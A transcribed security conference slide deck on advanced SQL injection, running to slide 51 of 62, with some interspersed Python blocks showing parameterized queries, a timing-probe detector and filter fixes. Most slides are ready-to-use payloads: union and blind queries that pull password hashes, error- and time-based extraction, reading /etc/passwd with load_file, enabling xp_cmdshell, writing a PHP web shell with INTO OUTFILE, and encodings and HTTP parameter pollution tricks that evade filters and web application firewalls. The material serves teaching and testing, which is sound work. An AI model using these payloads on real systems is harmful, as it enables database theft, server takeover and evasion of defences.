PT Devteev: Advanced SQL Injection (English slides)

Upload: arshid-amin

Post on 09-Apr-2018


  • 8/8/2019 Pt Devteev Advanced SQL Injection Eng 091118184202 Phpapp02

    1/62


    2/62

    Subjects in Question

    Introduction to web application security

    Classical approach to SQL Injection exploitation

    Blind SQL Injection

    Working with the file system and executing commands on the server under SQL Injection exploitation

    Methods to bypass program security filters

    Methods to bypass a Web Application Firewall (WAF)

    Conclusions


    3/62

    Introduction to Web Application Security


    4/62

    Unsafe World of Web Applications

    According to the statistics collected by PositiveTechnologies in 2008,

    83% of sites contain critical vulnerabilities

    78% of sites contain vulnerabilities of moderate risk level

    the probability of automatically infecting the pages of a vulnerable web application with malicious code is about 15-20%

    http://ptsecurity.ru/analytics.asp

    The data is based on automatic scanning of 16121 systems, detailed analysis of 59 web applications

    including analysis of the source code of over 10 applications.


    5/62


    6/62

    Chapter 1: SQL Injection Vulnerability

    Classical Approach to SQL Injection Exploitation


    7/62

    Illustrative Example of SQL Injection

    Request to the web server: http://web/?id=6329&print=Y

    Query passed to the DBMS: SELECT * from news where id = 6329


    8/62

    Illustrative Example of SQL Injection

    Request to the web server: http://web/?id=6329+union+select+id,pwd,0+from...

    Query passed to the DBMS: SELECT * from news where id = 6329 union select id,pwd,0 from...


    9/62

    SQL Injection Basic Concepts

    SQL Injection

    A method of attacking a database, bypassing the firewall. In this method, the parameters transmitted to the database via the web application are modified so that the executed SQL request changes.

    There are two types of SQL Injection

    SQL Injection into a string parameter

    Examples:

    SELECT * from table where name = "$_GET['name']"

    SELECT id, acl from table where user_agent ='$_SERVER["HTTP_USER_AGENT"]'

    SQL Injection into a numeric parameter

    Examples:

    SELECT login, name from table where id = $_COOKIE["id"]

    SELECT id, news from table where news = 123 limit $_POST["limit"]
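The two parameter types on this slide, reproduced as an added example (not code from the slides) in Python against an in-memory SQLite database: a numeric parameter and a string parameter spliced into the statement text, each beside the parameterized form. The table contents, the helper names and the sample inputs are constructed for this illustration; the numeric case also shows the boolean condition that the Blind chapter builds on.

```python
"""Vulnerable vs. parameterized query construction for the slide's
string-parameter and numeric-parameter cases, against an in-memory SQLite
database. Added example, not code from the slides; table contents are
constructed sample data."""
import sqlite3


def make_db():
    """Constructed sample schema following the slide's names (users, news)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, login TEXT, name TEXT, pwd TEXT);
        INSERT INTO users VALUES (1, 'alice', 'Alice', 'secret1');
        INSERT INTO users VALUES (2, 'bob',   'Bob',   'secret2');
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (6329, 'Public story');
    """)
    return conn


def news_by_id_vulnerable(conn, raw_id):
    """Numeric parameter spliced into the statement text, as in
    'SELECT * from news where id = 6329' on the slide. Whatever follows the
    number becomes part of the query (union, AND <condition>, ...)."""
    return conn.execute("SELECT id, title FROM news WHERE id = " + raw_id).fetchall()


def parse_id(raw_id):
    """Whitelist the numeric parameter: ASCII digits only, else None."""
    return int(raw_id) if (raw_id.isascii() and raw_id.isdigit()) else None


def news_by_id_safe(conn, raw_id):
    """Type-cast first, then bind the value; the DBMS never parses it as SQL."""
    ident = parse_id(raw_id)
    if ident is None:
        return []          # a real handler would answer 400 Bad Request here
    return conn.execute("SELECT id, title FROM news WHERE id = ?", (ident,)).fetchall()


def user_by_name_vulnerable(conn, raw_name):
    """String parameter pasted between quotes, as in
    "where name = '$_GET['name']'" on the slide."""
    sql = "SELECT login, name FROM users WHERE name = '" + raw_name + "'"
    return conn.execute(sql).fetchall()


def user_by_name_safe(conn, raw_name):
    """Bound parameter: quotes inside raw_name are data, not delimiters."""
    return conn.execute("SELECT login, name FROM users WHERE name = ?", (raw_name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Union-based: the spliced tail appends the users table to the result.
    print(news_by_id_vulnerable(db, "6329 union select id, pwd from users"))
    # Boolean-based (the Blind chapter): the row appears only if the condition holds.
    print(news_by_id_vulnerable(db, "6329 AND (SELECT substr(pwd,1,1) FROM users WHERE id=1)='s'"))
    print(news_by_id_safe(db, "6329 union select id, pwd from users"))   # []
    print(user_by_name_vulnerable(db, "x' OR '1'='1"))
    print(user_by_name_safe(db, "x' OR '1'='1"))                          # []
```

The safe variants do not try to recognise attacks at all: the numeric parameter is cast before use and the string parameter is bound, so the attack strings become either a rejected value or a plain comparison that matches nothing.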


    10/62

    SQL Injection Basic Concepts

    Methods of SQL Injection exploitation are classified according to the DBMS type and the exploitation conditions:

    The vulnerable request can also be an Insert, Update or Delete

    It is possible to inject SQL code into any part of SQL request

    Blind SQL Injection

    Features of SQL implementations used in various DBMSs

    The SQL Injection vulnerability is characteristic not only of web applications!


    11/62

    SQL Injection Basic Concepts

    SQL Injection classification

    SQL Injection can be exploited either immediately, during the attack, or after a while


    12/62

    SQL Injection Basic Concepts

    Methods to detect SQL Injection

    Function testing (black/white-box)

    Fuzzing

    Static/dynamic/manual analysis of the source code

    Examples of function testing for http://site/?param=123

    http://site/?param=1'
    http://site/?param=1'#
    http://site/?param=1"
    http://site/?param=1 order by 1000
    http://site/?param=1 AND 1=1--
    http://site/?param=1'--
    http://site/?param=1 AND 1=2--
    http://site/?param=1'/*
    http://site/?param=1' AND '1'='1
    ... etc.


    13/62

    SQL Injection Classical Exploitation (MySQL)

    Vulnerability detection

    /?id=1+ORDER+BY+100

    SQL request looks like

    SELECT id, name from table where id =1 ORDER BY 100

    As a result, the following error message can be received

    ERROR 1054 (42S22): Unknown column '100' in 'order clause'

    Obtaining table/column names (via information_schema or by search) and then obtaining data from the discovered tables

    /?id=1+union+select+0,concat_ws(0x3a,table_name,column_name)+from+information_schema.columns

    SQL request becomes

    SELECT id, name from table where id =1 union select

    0,concat_ws(0x3a,table_name,column_name) from information_schema.columns

    As a result, the desired information can be received in the following form

    | 0 | table1:column1 |
    | 0 | table1:column2 |


    14/62

    SQL Injection Features of Different DBMSs

    Features of exploitation for different DBMSs

    Example (MySQL): SELECT * from table where id = 1 union select 1,2,3

    Example (PostgreSQL): SELECT * from table where id = 1; select 1,2,3

    Example (Oracle): SELECT * from table where id = 1 union select null,null,null from sys.dual

    | Feature                            | MySQL                       | MSSQL       | MS Access | Oracle    | DB2                                  | PostgreSQL  |
    | String concatenation               | concat(,) concat_ws(delim,) | ' '+' '     | " "&" "   | ' '||' '  | '' concat '', " "+" ", ' '||' '      | ' '||' '    |
    | Comments                           | -- and /**/ and #           | -- and /*   | No        | -- and /* | --                                   | -- and /*   |
    | Request                            | union                       | union and ; | union     | union     | union                                | union and ; |
    | Sub-requests                       | v.4.1 >=                    | Yes         | No        | Yes       | Yes                                  | Yes         |
    | Stored procedures                  | No                          | Yes         | No        | Yes       | No                                   | Yes         |
    | information_schema or its analogs  | v.5.0 >=                    | Yes         | Yes       | Yes       | Yes                                  | Yes         |


    15/62

    SQL Injection Exploitation for Different DBMSs

    MySQL 4.1>=

    First entry: /?id=1 union select name,123 from users limit 0,1
    Second entry: /?id=1 union select name,123 from users limit 1,1

    MSSQL

    First entry: /?id=1 union select table_name,123 from (select row_number() over (order by name) as rownum, name from users) as t where t.rownum=1
    Second entry: /?id=1 union select table_name,123 from (select row_number() over (order by name) as rownum, name from users) as t where t.rownum=2

    PostgreSQL

    First entry: /?id=1 union select name, null from users limit 1 offset 0
    Second entry: /?id=1 union select name, null from users limit 1 offset 1

    or

    First entry: /?id=1; select name, 123 from users limit 1 offset 0
    Second entry: /?id=1; select name, 123 from users limit 1 offset 1


    16/62

    Chapter 2: Blind SQL Injection

    Blind SQL Injection


    17/62

    Blind SQL Injection Basic Concepts

    Blind SQL Injection

    A method of attacking a database, bypassing the firewall. In the course of exploiting an SQL Injection vulnerability, the attacker analyses the application logic (true/false).

    Blind SQL Injections can be classified according to the following criteria


    18/62

    Blind SQL Injection Basic Concepts

    Methods to detect Blind SQL Injection

    http://site/?param=-1 OR 1=1
    http://site/?param=-1 OR 1=1--
    ...
    http://site/?param=-1'
    http://site/?param=-1' AND 1=2
    ...
    http://site/?param=-1' OR '1'='1
    ...
    http://site/?param=-1"/*
    ...

    http://site/?param=2
    http://site/?param=1
    http://site/?param=2-1
    ...
    http://site/?param=1' AND 1=1
    http://site/?param=1' AND '1'='1
    etc.

    Methods to detect Double Blind SQL Injection

    http://site/?param=-1 AND benchmark(2000,md5(now()))
    ...
    http://site/?param=-1' AND benchmark(2000,md5(now()))--
    ...
    etc.


    19/62

    Blind SQL Injection Classical Exploitation (MySQL)

    Searching for the first character of the first table entry

    /?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),1,1))=97,555,777)

    SQL request becomes

    SELECT id, name from table where id =1 AND 555=if(ord(mid((select pass from users limit 0,1),1,1))=97,555,777)

    If the table users contains a column pass and the first character of the first entry in this column is 97 (letter a), then the DBMS will return TRUE; otherwise, FALSE.

    Searching for the second character of the first table entry

    /?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),2,1))=97,555,777)

    SQL request becomes

    SELECT id, name from table where id =1 AND 555=if(ord(mid((select pass from users limit 0,1),2,1))=97,555,777)

    If the table users contains a column pass and the second character of the first entry in this column is 97 (letter a), then the DBMS will return TRUE; otherwise, FALSE.


    20/62

    Blind SQL Injection Classical Exploitation (MySQL): Let's go faster

    We can restrict the range of character search. For example, for MD5 it is [0-9a-f], or 48-57, 97-102. Moreover, we can use the inequality signs!

    Searching for the first character of the first table entry

    /?id=1+AND+555=if(ord(lower(mid((select+pass+from+users+limit+0,1),1,1)))>97,555,777)

    If the table users contains a column pass and the first character of the first entry in this column is greater than 97 (letter a), then the DBMS will return TRUE; otherwise, FALSE.

    Searching for the first character of the second table entry

    /?id=1+AND+555=if(ord(lower(mid((select+pass+from+users+limit+1,1),1,1)))


    21/62

    Blind SQL Injection New Methods of Exploitation (MySQL): and even faster

    It is possible to find up to 12 characters using one request (method by QwazarX0709)

    Searching for the first character of the first table entry

    /?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,

    (0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,

    (0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,

    (0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,

    (0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,

    (0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,

    (0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,

    (0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,

    (0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,

    (0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,

    (0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,

    (select 1 union select 2),(1)))))))))))))

    If the table users contains a column pass and the first character of the first entry in this column belongs to the range [0-9a], then the DBMS will return an error message. Otherwise, it will return 1, i.e. the request will be correct.


    22/62

    Blind SQL Injection New Methods of Exploitation (MySQL): at the same rate

    How does it work?

    MySQL returns unique error messages using illegal regexps:

    select 1 regexp if(1=1,"x{1,0}",2)

    #1139 - Got error 'invalid repetition count(s)' from regexp

    select 1 regexp if(1=1,"x{1,(",2)

    #1139 - Got error 'braces not balanced' from regexp

    etc.

    An error message is also displayed if two entries are unexpectedly returned instead of one (method by Elekt):

    select if(1=1,(select 1 union select 2),2)

    #1242 - Subquery returns more than 1 row

    Note: in the example, hexadecimal equivalents were used, e.g. 0x787B312C307D instead of x{1,0}


    23/62

    Blind SQL Injection New Methods of Exploitation (MySQL): at the same rate

    If it is necessary to find an MD5 hash, only two requests are required.

    Request1

    /?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,(select 1 union select 2),(1)))))))))))))

    If the character does not belong to the range [0-9a], then the second request is sent (checking [b-f])

    /?id=1+AND+1+rlike+concat(if((mid((select+pass+from+users+limit+0,1),1,1)in('0'))>0,(0x787B312C3235367D),if((mid((select+pass+from+users+limit+0,1),1,1)in('1'))>0,(0x787B312C28),if((mid((select+pass+from+users+limit+0,1),1,1)in('2'))>0,(0x5B5B3A5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('3'))>0,(0x5B5B),if((mid((select+pass+from+users+limit+0,1),1,1)in('4'))>0,(0x28287B317D),if((mid((select+pass+from+users+limit+0,1),1,1)in('5'))>0,(0x0),if((mid((select+pass+from+users+limit+0,1),1,1)in('6'))>0,(0x28),if((mid((select+pass+from+users+limit+0,1),1,1)in('7'))>0,(0x5B322D315D),if((mid((select+pass+from+users+limit+0,1),1,1)in('8'))>0,(0x5B5B2E63682E5D5D),if((mid((select+pass+from+users+limit+0,1),1,1)in('9'))>0,(0x5C),if((mid((select+pass+from+users+limit+0,1),1,1)in('a'))>0,(select 1 union select 2),(1)))))))))))))


    24/62

    Blind SQL Injection New Methods of Exploitation (MySQL): at the maximal rate!

    A new method using the function ExtractValue(), based on experiments with the function NAME_CONST() (MySQL v.5.0.12 > v.5.0.64, X0909) conducted by Qwazar:

    select 1 AND ExtractValue(1,concat(0x5C,('test')));

    As a result, the following error message can be received (if MySQL version is >=5.1)

    XPATH syntax error: '\test'

    Thus, we can simply return the desired data:

    /?id=1+AND+extractvalue(1,concat(0x5C,(select pass from users limit 0,1)))

    SQL request becomes

    SELECT id, name from table where id =1 AND extractvalue(1,concat(0x5C,(select pass from users limit 0,1)))

    As a result, the desired information can be received in the following form

    The error message string cannot contain more than 31 characters. The function mid() and the like can be applied to display longer strings.


    25/62

    Blind SQL Injection New Methods of Exploitation (MySQL): The Rate Limit

    What if error messages are suppressed?

    We can restrict the range of character search. For example, for MD5 this range is [0-9a-f].

    We can use news titles, site sections etc. as signatures.

    Implementation:

    /?id=if((mid((select pwd from users limit 0,1),1,1)in('a'))>0,(12345),if((mid((select pwd from users limit 0,1),1,1)in('b'))>0,(12346), .. ,null))

    or

    /?id=if((mid((select pwd from users limit 0,1),1,1)in('a','b','c','d','e','f'))>0,(12345),if((mid((select pwd from users limit 0,1),1,1)in('0','1','2','3','4','5','6','7','8','9'))>0,(12346), .. ,null))

    In this example, 12345 and 123456 represent identifiers of news on the site.

    Restrictions of this method: Appropriate application architecture;

    The length of HTTP request cannot be more than 4096 bytes.


    26/62

    Double Blind SQL Injection Classical Exploitation (MySQL): More haste, less speed ;)

    Exploitation of Double Blind SQL Injection is based on time delays.

    We can restrict the range of character search to increase performance.

    Classical implementation:

    /?id=1+AND+if((ascii(lower(substring((select password from user limit 0,1),0,1))))=97,1,benchmark(2000000,md5(now())))

    We can conjecture that the character was guessed right on the basis of the time delay of the web server response;

    Manipulating the value 2000000, we can achieve acceptable performance for a concrete application;

    The function sleep() is an analogue of the function benchmark(). Function sleep() is more secure in the given context, because it doesn't use server resources.
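Time-based probes of the kind this slide describes leave two traces on the server side: a delay function in the request and an outlier response time. The following is an added example, not code from the slides, that checks for both over constructed access-log lines in the form "<request path> <response time in ms>" (a made-up format, not any real server's log); the function names and the threshold factor are assumptions for this illustration.

```python
"""Timing-based (double blind) probes leave two traces: a delay function in
the request and an outlier response time. Added example, not from the
slides: both checks over constructed access-log lines in the form
'<request path> <response time in ms>' (not a real server log format)."""
import re
import statistics
from urllib.parse import unquote_plus

DELAY_FN = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)

# Constructed sample: ordinary requests around 40 ms, then the slide's
# benchmark()/sleep() probes. A probe whose condition is true returns fast.
SAMPLE_LOG = [
    "/?id=6329&print=Y 42",
    "/?id=5351 39",
    "/?id=8234 45",
    "/?id=1 41",
    "/?id=1+AND+if(1=1,1,benchmark(2000000,md5(now()))) 44",
    "/?id=1+AND+if(1=2,1,benchmark(2000000,md5(now()))) 3910",
    "/?id=1+AND+if(1=2,1,sleep(5)) 5038",
]


def parse_line(line):
    """Split one constructed log line into (path, response_ms)."""
    path, ms = line.rsplit(" ", 1)
    return path, int(ms)


def find_timing_anomalies(lines, factor=10):
    """Return (path, ms, reasons) for suspicious lines. 'slow-response' is a
    response slower than factor x the median; 'delay-function' is a
    sleep()/benchmark() call in the decoded request."""
    rows = [parse_line(line) for line in lines]
    baseline = statistics.median(ms for _, ms in rows)
    findings = []
    for path, ms in rows:
        reasons = []
        if DELAY_FN.search(unquote_plus(path)):
            reasons.append("delay-function")
        if ms > factor * baseline:
            reasons.append("slow-response")
        if reasons:
            findings.append((path, ms, reasons))
    return findings


if __name__ == "__main__":
    for path, ms, reasons in find_timing_anomalies(SAMPLE_LOG):
        print(f"{ms:>5} ms  {reasons}  {path}")
```

In the sample the probe whose condition happened to be true (44 ms) is caught only by the request signature, while the two slow responses are caught by the latency rule as well; the two checks cover different halves of the probe sequence, and a benchmark()-based probe would additionally show up as CPU load on the database host, which is the resource difference the slide notes between benchmark() and sleep().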


    27/62

    Chapter 3: Working with File System and Executing Commands on Server

    Working with File System and Executing Commands on Server Under SQL Injection Exploitation


    28/62

    Working with File System

    General architecture of using the file system via SQL Injection

    Requests are received from the DBMS user (to work with the file system, the file_priv privilege is required)

    The file system is accessed by the DBMS user (appropriate permissions are required at the ACL level)

    The current directory is the DBMS directory

    If you access a file created by the DBMS, keep in mind that the file owner is the DBMS user (e.g. uid=88(mysql) gid=88(mysql)), not the web server user (e.g. uid=80(www) gid=80(www))


    29/62

    Working with File System Difference of DBMSs

    An example for MSSQL:

    CREATE TABLE mydata (line varchar(8000));
    BULK INSERT mydata FROM 'c:\boot.ini';
    SELECT * FROM mydata;
    DROP TABLE mydata;

    | Feature             | MySQL                                           | MSSQL                             | MS Access | Oracle                            | PostgreSQL                              |
    | Built-in functions  | Yes                                             | No                                | Yes       | No                                | Yes                                     |
    | Available functions | load_file, load data infile, into outfile/dumpfile | Procedures, e.g. insert from file | curdir()  | Procedures, e.g. insert from file | pg_read_file(), pg_ls_dir(), copy, etc. |


    30/62

    Working with File System

    An example for MySQL

    LOAD_FILE: union select load_file('/etc/passwd')

    LOAD DATA INFILE: create table t(a varchar(500)); load data infile '/etc/passwd' into table t; select a from t;

    SELECT INTO OUTFILE: union select 1 into outfile 't'

    SELECT INTO DUMPFILE: union select 1 into dumpfile 't'


    31/62

    Executing Commands on Server Difference of DBMSs

    An example for MSSQL: EXEC xp_cmdshell 'ipconfig /all';

    To use xp_cmdshell in MSSQL >= 2005, it is necessary to perform the following:

    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;

    | Feature             | MySQL | MSSQL            | MS Access | Oracle         | PostgreSQL     |
    | Built-in functions  | No    | Yes              | Yes       | No             | No             |
    | Available functions | No    | EXEC xp_cmdshell | shell()   | Own procedures | Own procedures |


    32/62

    Executing Commands on Server

    An example for MySQL

    Writing web-shell to the file /www/img/shell.php

    /?id=1+union+select+''+into+outfile+'/www/img/shell.php'

    Executing commands on server

    /img/shell.php?shell=passthru('ls');


    33/62

    Chapter 4: Methods to Bypass Security Filters

    Methods to Bypass Security Filters


    34/62

    Filters for Incoming data. Types

    Transparent for web applications

    magic_quotes_gpc, display_errors, etc.

    mod_rewrite, ISAPI filters, etc.

    Built-in functions of the development language

    Universal

    Example: addslashes(), addcslashes(), htmlspecialchars(), etc

    Meant for a certain environment. Example: mysql_real_escape_string(), pg_escape_string(), dbx_escape_string(), etc

    In-house design of a programmer

    Type casting

    Using regular expressions


    35/62

    Methods to Bypass Security Filters (1)

    Apply coding to the data transmitted to the application

    There is an unlimited number of forms to represent the string qwerty

    Hex coding: 0x717765727479

    ASCII representation: char(113),char(119),char(101),char(114),char(116),char(121)

    Encryption with various keys (the ciphertext is binary, see the example below)

    Example:

    hex(AES_ENCRYPT('qwerty',1)) is B969A9A01DA8E78FA8DD7E299C9CF23D

    aes_decrypt(concat(0xB9,0x69,0xA9,0xA0,0x1D,0xA8,0xE7,0x8F,0xA8,0xDD,0x7E,0x29,0x9C,0x9C,0xF2,0x3D),1) is qwerty


    36/62

    Methods to Bypass Security Filters (2)

    Apply codes that are not processed by the filter

    Function synonyms

    CHARACTER_LENGTH() -> CHAR_LENGTH()

    LOWER() -> LCASE()

    OCTET_LENGTH() -> LENGTH()

    LOCATE() -> POSITION()

    REGEXP() -> RLIKE()

    UPPER() -> UCASE()

    etc.

    Obfuscated codes for requests and data

    Examples of obfuscated codes for the string qwerty:

    reverse(concat(if(1,char(121),2),0x74,right(left(0x567210,2),1),lower(mid('TEST',2,1)),replace(0x7074,'pt','w'),char(instr(123321,33)+110)))

    concat(unhex(left(crc32(31337),3)-400),unhex(ceil(atan(1)*100-2)),unhex(round(log(2)*100)-4),char(114),char(right(cot(31337),2)+54),char(pow(11,2)))


    37/62

    Methods to Bypass Security Filters

    An example of bypassing signatures (obfuscated code for a request)

    The following request will be matched by the application's signature

    /?id=1+union+(select+1,2+from+test.users)

    But sometimes the signatures can be bypassed

    /?id=1+union+(select+'xz'from+xxx)

    /?id=(1)unIon(selEct(1),mid(hash,1,32)from(test.users))

    /?id=1+union+(sELect'1',concat(login,hash)from+test.users)

    /?id=(1)union(((((((select(1),hex(hash)from(test.users))))))))

    /?id=(1);exec('sel'+'ect'(1))

    /?id=(1)or(0x50=0x50)


    38/62

    Methods to Bypass Security Filters (3)

    Use null-byte to bypass binary-dependent functions

    Example: if(ereg ("^(.){1,3}$", $_GET['param'])) { }

    /?param=123
    ereg ("^(.){1,3}$", "123") - true

    /?param=1234
    ereg ("^(.){1,3}$", "1234") - false

    /?param=1+union+select+1
    ereg ("^(.){1,3}$", "1 union select 1") - false

    /?param=123%00
    ereg ("^(.){1,3}$", "123\0") - true

    /?param=1/*%00*/union+select+1
    ereg ("^(.){1,3}$", "1/*\0*/union select 1") - true


    39/62

    Methods to Bypass Security Filters (4)

    Bypassing function addslashes()

    It is possible if there is a vulnerability that allows attackers to set the SJIS, BIG5 or GBK encoding

    How does it work?

    addslashes("'"): the single quote 0x27 becomes "\'", i.e. 0x5c27

    An example for the GBK encoding:

    0xbf27 is an illegal character

    0xbf5c is a valid independent character

    0xbf27, being processed with the function addslashes(), becomes 0xbf5c27, i.e. 0xbf5c and a single quote 0x27

    Raz0r, http://raz0r.name/vulnerabilities/sql-inekcii-svyazannye-s-multibajtovymi-kodirovkami-i-addslashes/


    40/62

    Methods to Bypass Security Filters (5)

    A common vulnerability in the functions of security filters

    The following request doesn't allow malicious users to conduct an attack

    /?id=1+union+select+1,2,3/*

    If there is a corresponding vulnerability in the filter, the following request will be successfully processed

    /?id=1+un/**/ion+sel/**/ect+1,2,3--

    SQL request becomes

    SELECT * from table where id =1 union select 1,2,3--

    Any set of characters that is cut by the filter (e.g. #####, %00, etc.) can be used instead of /**/

    The given example works in case of "superfluous cleaning" of incoming data (replacing the regexp match with an empty string)
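The "superfluous cleaning" filter of this slide and the non-binary-safe ereg() check of slide 38 fail for the same underlying reason: the filter inspects one representation of the input while the database sees another. The following is an added example in Python, not code from the slides (which use PHP): the keyword blacklist applied in the wrong order, the same blacklist normalized to a fixed point first, a regex length check with Python's own end-anchor pitfall (`$` also matches before a trailing newline, the analogue of ereg() stopping at a null byte), and the strict integer whitelist that makes both filters unnecessary. Function names and sample inputs are constructed for this illustration.

```python
"""Why "superfluous cleaning" and loose validation fail, in Python. Added
example, not code from the slides (which use PHP's ereg()): a keyword
blacklist applied in the wrong order, the same blacklist cleaned to a fixed
point first, a regex length check with Python's own end-anchor pitfall
(`$` matches before a trailing newline, the analogue of ereg() stopping at
a null byte), and the strict integer check that makes the filters
unnecessary. Function names and inputs are constructed."""
import re

FORBIDDEN = re.compile(r"union|select", re.IGNORECASE)
COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def filter_check_then_clean(value):
    """Signature check first, comment stripping second: the 'superfluous
    cleaning' case. Returns the cleaned value, or None if rejected."""
    if FORBIDDEN.search(value):
        return None
    return COMMENT.sub("", value)   # un/**/ion becomes union after the check already passed


def strip_comments_fixpoint(value):
    """Remove /* */ comments until nothing changes, so a comment that is
    reassembled by removing an inner one (un//**/**/ion) does not survive."""
    while True:
        cleaned = COMMENT.sub("", value)
        if cleaned == value:
            return cleaned
        value = cleaned


def filter_clean_then_check(value):
    """Same blacklist, but normalized to a fixed point before the check."""
    cleaned = strip_comments_fixpoint(value)
    return None if FORBIDDEN.search(cleaned) else cleaned


def length_check_loose(value):
    """Python's `$` also matches just before a final newline, so the 4-byte
    '123\\n' passes a 1-to-3 character check."""
    return re.match(r"^.{1,3}$", value) is not None


def length_check_strict(value):
    """fullmatch() anchors at the true end of the string."""
    return re.fullmatch(r".{1,3}", value) is not None


def as_numeric_id(value):
    """Whitelist instead of blacklist: ASCII digits only, else None."""
    if re.fullmatch(r"[0-9]{1,10}", value) is None:
        return None
    return int(value)


if __name__ == "__main__":
    probe = "1 un/**/ion sel/**/ect 1,2,3--"
    print(filter_check_then_clean(probe))   # 1 union select 1,2,3--
    print(filter_clean_then_check(probe))   # None
    print(length_check_loose("123\n"), length_check_strict("123\n"))   # True False
    print(as_numeric_id("123"), as_numeric_id("1 union select 1"))      # 123 None
```

The order fix (clean, then check) closes the case on this slide but still leaves a blacklist that any synonym or encoding from the earlier slides can sidestep; the numeric whitelist has nothing to sidestep, which is why it is the check to keep.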


    41/62

    Chapter 5: Methods to Bypass Web Application Firewall

    Methods to Bypass Web Application Firewall (WAF)


    42/62

    What is a WAF

    Requests pass through the WAF before they reach the web server:

    http://server/?id=6329&print=Y
    http://server/?id=5351
    http://server/?id=8234
    http://server/?id=>...
    http://server/?id=1+union+select...
    http://server/?id=/../../../etc/passwd

    An attack is detected! Alarm!!!

    Data normalization:

    Decode HTML entities (e.g. the entity forms of c, ", ...)

    Escaped characters (e.g. \t, \001, \xAA, \uAABB)

    Null byte string termination

    ...

    Signature search:

    /(sel)(ect.+fr)(om)/is

    /(uni)(on.+sel)(ect)/is

    ...


    43/62

    Classification

    According to the behavior:

    Bridge/Router

    Reverse Proxy

    Built-in

    According to the protection model:

    Signature-based

    Rule-based

    According to the response to a bad request:

    Cleaning of dangerous data

    Blocking the request

    Blocking the attack source


    44/62

    Methods to Bypass WAF

    Fundamental technology limitations

    Inability to protect a web application from all possible vulnerabilities

    General problems

    When using universal WAF filters, it is necessary to balance filter efficiency against minimizing false responses, in which valid traffic is blocked

    Processing of the traffic returned to a client

    Implementation Vulnerabilities

    Normalization techniques

    Application of new methods of web vulnerability exploitation (HTTP Parameter Pollution, HTTP Parameter Fragmentation, null-byte replacement, etc.)


    45/62


    46/62

    Practice of Bypassing WAF: SQL Injection HPP (example 1)

    Using HTTP Parameter Pollution (HPP)

    The following request doesn't allow anyone to conduct an attack

    /?id=1;select+1,2,3+from+users+where+id=1--

    This request will be successfully performed using HPP

    /?id=1;select+1&id=2,3+from+users+where+id=1--

    Successful conduction of an HPP attack bypassing a WAF depends on the environment of the application being attacked

    OWASP EU09, Luca Carettoni, Stefano di Paola

    http://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf


    47/62

    Practice of Bypassing WAF: SQL Injection HPP

    How does it work?


    48/62


    49/62

    Practice of Bypassing WAF: SQL Injection HPP (example 2)

    Using HTTP Parameter Pollution (HPP)

    Vulnerable code

    SQL="select key from table where id="+Request.QueryString("id")

    This request is successfully performed using the HPP technique

    /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

    The SQL request becomes

    select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users

    Lavakumar Kuppan, http://lavakumar.com/Split_and_Join.pdf


    50/62

    Practice of Bypassing WAF: SQL Injection HPF

    Using HTTP Parameter Fragmentation (HPF)

    Vulnerable code example

    Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);

    Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);

    The following request doesn't allow anyone to conduct an attack

    /?a=1+union+select+1,2/*

    These requests may be successfully performed using HPF

    /?a=1+union/*&b=*/select+1,2

    /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--

    The SQL requests become

    select * from table where a=1 union/* and b=*/select 1,2

    select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--

    http://www.webappsec.org/lists/websecurity/archive/2009-08/msg00080.html


    51/62

    Practice of Bypassing WAF: Blind SQL Injection

    Using logical requests AND/OR

    The following requests allow one to conduct a successful attack against many WAFs

    /?id=1+OR+0x50=0x50

    /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74

    Negation and inequality signs (!=, <>, etc.) can be used instead of the equality sign. It is amazing, but many WAFs miss it!

    It becomes possible to exploit the vulnerability with the blind SQL Injection method by replacing the SQL functions that hit WAF signatures with their synonyms

    substring() -> mid(), substr(), etc

    ascii() -> hex(), bin(), etc

    benchmark() -> sleep()

